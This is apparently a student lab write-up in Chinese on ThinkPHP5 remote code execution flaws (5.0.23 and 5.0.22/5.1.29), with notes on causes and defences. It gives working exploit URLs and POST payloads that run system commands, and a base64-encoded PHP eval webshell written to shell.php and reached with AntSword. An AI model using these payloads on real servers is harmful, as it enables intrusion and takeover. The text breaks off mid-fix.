代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8
漏洞执行命令的原理:
两个条件:
- 用户能够函数的输入
- 存在可以执行代码的危险函数。
如何预防命令执行漏洞:
PHP内置的两个函数可以有效防止命令执行:
1. escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。资料参考:http://cn.php.net/manual/zh/function.escapeshellarg.php
2. escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。资料参考:http://cn.php.net/manual/zh/function.escapeshellcmd.php
3. php中禁止disable_functions(禁用一些危险函数)
4. 参数值尽量使用引用号包裹,并在拼接前调用addslashes进行转义
当然,修复方法还有很多方式,修复方式一般有两种思维:
1、黑名单:过滤特殊字符或替换字符 2、白名单:只允许特殊输入的类型/长度
代码执行漏洞和命令执行漏洞的区别:
命令执行漏洞:将用户的输入拼接到命令中去,又对用户的输入没有过滤(原因,以及xss sql),调用一些函数直营系统命令。
代码执行漏洞:在web应用中,为了考虑代码的灵活性和简洁性会调用一些危险的函数去处理(eg:eval函数),将一些字符串当成php代码去执行,没有考虑用户是否能控制这些代码,造成了代码执行的危害。
http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞
http://159.75.16.25:8087 复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
复现漏洞要求:
(1)操作步骤配截图。
(2) 要求复现时进行挂马操作,小马大马都可,需要有webshell管理工具截图。
并简述如何修复这两个版本的漏洞?言之有理即可
http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞
http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞
- 打开该网站:
- 访问该网页的index页面:
执行whoami,访问url :http://159.75.16.25:8089/index.php?s=captcha?s=captcha
_method=__construct&filter[]=system&method=get&get[]=whoami
- 使用php语言:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd查看当前目录:得到/var/www/public
- 构造php文本:
- 发送post请求到页面,之后访问shell.php
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n bHh5PD9waHAgZXZhbChAJF9QT1NUWydyb290J10pOyA/Pmx4eQ== | base64 -d > shell.php
- 访问shell.php ,出现lxylxy
- 使用蚁剑进行连接:
- 挂马复现成功。
http://159.75.16.25:8087 复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
- 打开该网址:
- 执行whoami:将whoami的代码跟在url后面。
http://159.75.16.25:8087/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
- 将想要嵌入的代码通过base64编码后紧跟在url后面。
- 使用蚁剑进行连接。
- 查看目录:
如何修复:
ThinkPHP 5.0< 5.0.22修复方法:在think\APP类的module方法的获取控制起的代码在后面加上
